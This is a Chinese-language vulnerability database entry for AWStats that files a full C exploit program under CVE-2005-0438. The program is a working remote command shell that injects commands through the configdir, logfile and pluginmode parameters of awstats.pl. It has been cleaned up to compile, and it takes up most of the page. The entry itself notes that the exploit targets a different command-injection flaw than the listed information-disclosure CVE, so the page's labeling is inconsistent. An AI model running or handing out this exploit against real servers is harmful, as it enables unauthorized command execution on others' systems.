AWStats漏洞
漏洞ID | 1108495 | 漏洞类型 | 未知 |
发布时间 | 2005-03-02 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2005-0438 |
CNNVD-ID | CNNVD-200505-649 |
漏洞平台 | CGI | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
AWStats 6.3 和 6.4 中的 awstats.pl 使得远程攻击者可以通过设置调试参数来获取敏感信息。注意：下文“漏洞EXP”给出的代码（其横幅标注为 Awstats 5.7 - 6.2）利用的是 configdir、logfile、pluginmode 三个参数的命令注入，以 httpd 的权限执行任意命令，与本条目描述的调试参数信息泄露并非同一缺陷；该命令注入问题对应的 CVE 编号本页未列出，不应据此将 CVE-2005-0438 理解为远程代码执行漏洞。
|漏洞EXP
/*
* Awstats exploit "shell"
* code by omin0us
* omin0us208 [at] gmail [dot] com
* dtors security group
* .:( http://dtors.ath.cx ):.
*
* Vulnerability reported by iDEFENSE
* pluginmode bug has been found by GHC team.
*
* The awstats exploit that was discovered allows
* a user to execute arbitrary commands on the
* remote server with the privileges of the httpd
*
* This exploit combines all three methods of exploitation
* and acts as a remote "shell", parsing all returned
* data to display command output and running in a loop
* for continuous access.
*
* bash-2.05b$ awstats_shell localhost
* Awstats 5.7 - 6.2 exploit Shell 0.1
* code by omin0us
* dtors security group
* .: http://dtors.ath.cx :.
* --------------------------------------
* select exploit method:
* 1. ?configdir=|cmd}
* 2. ?update=1&logfile=|cmd|
* 3. ?pluginmode=:system("cmd");
*
* method [1/2/3]? 1
* starting shell...
* (ctrl+c to exit)
* sh3ll> id
* uid=80(www) gid=80(www) groups=80(www)
* DTORS_STOP
* sh3ll> uname -a
*
* FreeBSD omin0us.dtors.ath.cx 4.8-RELEASE FreeBSD 4.8-RELEASE #3: Mon Oct 11
* 19:34:01 EDT 2004 omin0us@localhost:/usr/src/sys/compile/DTORS i386
* DTORS_STOP
* sh3ll>
*
* this is licensed under the GPL
*/
#define _DEFAULT_SOURCE          /* getopt()/optind, h_addr: hidden under -std=c11 otherwise */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>           /* inet_ntoa(): was called without a declaration */
#include <netdb.h>
#define PORT 80
#define CMD_BUFFER 512
#define IN_BUFFER 10000
#define MAGIC_START "DTORS_START"
#define MAGIC_STOP "DTORS_STOP"
void usage(char *argv[]);
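/*
 * Percent-encode the spaces in `cmd` into `out` (capacity `out_len`).
 *
 * Only ' ' is rewritten (to "%20"), exactly as the original did; every other
 * byte is copied through unchanged, so a command containing '&', '#' or '+'
 * is still at the mercy of the server's query-string parsing.
 *
 * Returns 0 on success, -1 if the encoded form plus terminator would not fit.
 * `out` is NUL-terminated on success.
 */
static int url_encode_spaces(const char *cmd, char *out, size_t out_len)
{
    size_t j = 0;

    for (size_t i = 0; cmd[i] != '\0'; i++) {
        if (cmd[i] == ' ') {
            if (j + 3 >= out_len)
                return -1;
            out[j++] = '%';
            out[j++] = '2';
            out[j++] = '0';
        } else {
            if (j + 1 >= out_len)
                return -1;
            out[j++] = cmd[i];
        }
    }
    out[j] = '\0';
    return 0;
}

/*
 * Format the HTTP request for the selected injection method into `req`.
 *
 * The three request shapes are those of the original tool, byte for byte:
 *   '1'  ?configdir=|...|
 *   '2'  ?update=1&logfile=|...|
 *   '3'  ?pluginmode=:system("...");   (also sends Connection/Host headers)
 * The command is bracketed by `echo MAGIC_START` / `echo MAGIC_STOP` so the
 * caller can cut the command output out of the response.  Line ends are bare
 * LF as in the original; RFC 2616 wants CRLF, the Apache of that era
 * tolerated LF.
 *
 * Returns 0 on success, -1 for an unknown method or if the request would be
 * truncated (a truncated request must not be sent).
 */
static int build_request(char *req, size_t cap, int method,
                         const char *awstats_dir, const char *cmd_url,
                         const char *host)
{
    int n;

    switch (method) {
    case '1':
        n = snprintf(req, cap,
                     "GET %s?configdir=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n",
                     awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
        break;
    case '2':
        n = snprintf(req, cap,
                     "GET %s?update=1&logfile=|echo;echo+%s;%s;echo+%s;echo| HTTP/1.0\n\n",
                     awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP);
        break;
    case '3':
        n = snprintf(req, cap,
                     "GET %s?pluginmode=:system(\"echo+%s;%s;echo+%s\"); HTTP/1.0\n"
                     "Connection: Keep-Alive\n"
                     "Host: %s\n\n",
                     awstats_dir, MAGIC_START, cmd_url, MAGIC_STOP, host);
        break;
    default:
        return -1;
    }
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/*
 * Write all `len` bytes of `data` to `fd`, retrying on short writes.
 * Returns 0 on success, -1 on error or a zero-length write.
 */
static int send_all(int fd, const char *data, size_t len)
{
    while (len > 0) {
        ssize_t sent = write(fd, data, len);
        if (sent <= 0)
            return -1;
        data += sent;
        len -= (size_t)sent;
    }
    return 0;
}

/*
 * Read `fd` one byte at a time, appending at buf[*pos], until `marker`
 * appears somewhere in `buf`.  With `echo` set every byte read is also
 * written to stdout (this is how command output reaches the user).
 *
 * `buf` is kept NUL-terminated so strstr() never runs off the end; a NUL
 * byte in the response stops the search early, as it did in the original.
 * Returns 0 when the marker was seen, -1 on EOF/read error or when the
 * buffer is full.  On -1 the caller should not retry on the same socket.
 */
static int read_until(int fd, char *buf, size_t cap, size_t *pos,
                      const char *marker, int echo)
{
    while (strstr(buf, marker) == NULL) {
        if (*pos + 1 >= cap)              /* keep room for the terminator */
            return -1;
        char byte;
        ssize_t got = read(fd, &byte, 1);
        if (got <= 0)                     /* EOF or error: no stale-byte loop */
            return -1;
        buf[(*pos)++] = byte;
        buf[*pos] = '\0';
        if (echo)
            putchar(byte);
    }
    return 0;
}

/*
 * Entry point: interactive "shell" over the AWStats command-injection
 * parameters described in the file header.
 *
 *   argv: [-d <path-to-awstats.pl>] [-v] <host>
 *
 * Flow: parse options, resolve the host once, ask for a method, then loop:
 * read a command, percent-encode spaces, open a fresh TCP connection to
 * PORT, send the request, discard the response up to MAGIC_START, echo
 * everything up to and including MAGIC_STOP, close.  An empty command line
 * is replaced by "id", as in the original.
 *
 * Fixes relative to the listing, all behaviour-visible:
 *   - `\n`, `\t`, `\0` and `\"` escapes restored (the listing had lost its
 *     backslashes, so it neither compiled nor terminated its lines);
 *   - `method` initialised before the read-until-valid loop (it was read
 *     uninitialised); the rest of the input line is drained so the leftover
 *     newline no longer turns into an implicit first "id" command;
 *   - getopt() result kept in an int (a `char` may be unsigned, so the
 *     `< 0` end test could never be true);
 *   - fgets() failure and empty input handled (the original wrote to
 *     cmd[-1] on EOF);
 *   - read() return value checked in both receive loops, bounds kept so the
 *     buffer stays NUL-terminated for strstr();
 *   - the fdopen() stream over the socket is gone: fclose() after close()
 *     on the same descriptor was a double close.
 *
 * NOTE(review): the surrounding page files this under CVE-2005-0438 (debug
 * parameter information disclosure in 6.3/6.4); the banner and requests here
 * target the 5.7-6.2 command-injection parameters instead.  Run only against
 * systems you are authorised to test.
 */
int main(int argc, char *argv[])
{
    char *awstats_dir = NULL;
    int verbose = 0;
    int cli_opt;

    if (argc < 2)
        usage(argv);                                /* does not return */

    printf("Awstats 5.7 - 6.2 exploit Shell 0.1\n");
    printf("code by omin0us\n");
    printf("dtors security group\n");
    printf(".: http://dtors.ath.cx :.\n");
    printf("--------------------------------------\n");

    /* "h:" is accepted but unused, exactly as in the original option string. */
    while ((cli_opt = getopt(argc, argv, "h:d:v")) != -1) {
        switch (cli_opt) {
        case 'v':
            verbose = 1;
            break;
        case 'd':
            awstats_dir = optarg;
            break;
        default:
            break;
        }
    }
    if (optind >= argc || strcmp(argv[optind], "-") == 0) {
        printf("Please specify a Host\n");
        usage(argv);
    }
    const char *target = argv[optind];
    if (awstats_dir == NULL)
        awstats_dir = "/cgi-bin/awstats.pl";

    /* Resolve once; the original re-resolved before every command. */
    struct hostent *host = gethostbyname(target);
    if (host == NULL || host->h_addrtype != AF_INET || host->h_addr_list[0] == NULL) {
        printf("Could not resolv host\n");
        exit(1);
    }
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    memcpy(&addr.sin_addr, host->h_addr_list[0], sizeof addr.sin_addr);

    printf("select exploit method:\n"
           "\t1. ?configdir=|cmd}\n"
           "\t2. ?update=1&logfile=|cmd|\n"
           "\t3. ?pluginmode=:system(\"cmd\");\n");
    int method = 0;
    while (method != '1' && method != '2' && method != '3') {
        printf("\nmethod [1/2/3]? ");
        fflush(stdout);
        method = getchar();
        if (method == EOF) {                        /* no stdin: don't spin */
            printf("\n");
            exit(1);
        }
    }
    /* Drain the rest of the line so the newline is not read as the first command. */
    for (int ch = getchar(); ch != '\n' && ch != EOF; ch = getchar())
        ;

    printf("starting shell...\n(ctrl+c to exit)\n");
    for (;;) {
        char cmd[CMD_BUFFER];
        char cmd_url[CMD_BUFFER * 3];
        char request[CMD_BUFFER * 3 + 1024];
        char incoming[IN_BUFFER];
        size_t pos = 0;

        printf("sh3ll> ");
        fflush(stdout);
        if (fgets(cmd, sizeof cmd, stdin) == NULL) {
            printf("\n");
            break;                                  /* EOF on stdin: leave quietly */
        }
        cmd[strcspn(cmd, "\n")] = '\0';             /* strip newline; safe on "" */
        if (cmd[0] == '\0')
            strcpy(cmd, "id");

        if (url_encode_spaces(cmd, cmd_url, sizeof cmd_url) != 0) {
            printf("command too long\n");
            continue;
        }
        if (build_request(request, sizeof request, method, awstats_dir,
                          cmd_url, target) != 0) {
            printf("request too long\n");
            continue;
        }

        int sockfd = socket(AF_INET, SOCK_STREAM, 0);
        if (sockfd < 0) {
            printf("Error creating socket\n");
            exit(1);
        }
        if (verbose)
            printf("Connecting to %s (%s)...\n", host->h_name, inet_ntoa(addr.sin_addr));
        if (connect(sockfd, (struct sockaddr *)&addr, sizeof addr) != 0) {
            printf("Could not connect to host\n");
            close(sockfd);
            exit(1);
        }
        if (verbose) {
            printf("Sending Request\n");
            fputs(request, stdout);
        }
        if (send_all(sockfd, request, strlen(request)) != 0) {
            printf("Could not send request\n");
            close(sockfd);
            exit(1);
        }

        /* Skip headers and page up to the start marker, then echo the output
         * up to and including the stop marker. */
        incoming[0] = '\0';
        if (read_until(sockfd, incoming, sizeof incoming, &pos, MAGIC_START, 0) != 0) {
            printf("exploitation of host failed\n");
            close(sockfd);
            exit(1);
        }
        if (read_until(sockfd, incoming, sizeof incoming, &pos, MAGIC_STOP, 1) != 0) {
            printf("\n[-] incoming buffer full or connection closed\n");
            close(sockfd);
            exit(1);
        }
        printf("\n");
        shutdown(sockfd, SHUT_WR);
        close(sockfd);
    }
    return 0;
}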
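/*
 * Print command-line help to stdout and exit with status 1.
 *
 * argv[0] is used as the program name (falls back to "awstats_shell" when
 * argv[0] is absent, e.g. argc == 0).  This function never returns; main()
 * relies on that after "Please specify a Host".  The `\n` escapes lost in
 * the listing are restored; the help text itself is unchanged.
 */
void usage(char *argv[])
{
    const char *prog = (argv != NULL && argv[0] != NULL) ? argv[0] : "awstats_shell";

    printf("Usage: %s [options] <host>\n", prog);
    printf("Options:\n");
    printf(" -d <awstats_dir> directory of awstats script\n");
    printf(" '/cgi-bin/awstats.pl' is default\n");
    printf(" if no directory is specified\n\n");
    printf(" -v verbose mode (optional)\n\n");
    printf("example: %s -d /stats/awstats.pl website.com\n\n", prog);
    exit(1);
}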
// milw0rm.com [2005-03-02]
|受影响的产品
AWStats AWStats 6.4
AWStats AWStats 6.3
|参考资料
来源:SECUNIA
名称:14299
链接:http://secunia.com/advisories/14299
来源:XF
名称:awstats-information-disclosure(19477)
链接:http://xforce.iss.net/xforce/xfdb/19477
来源:BUGTRAQ
名称:20050214 AWStats <= 6.4 Multiple vulnerabilities
链接:http://www.securityfocus.com/archive/1/390368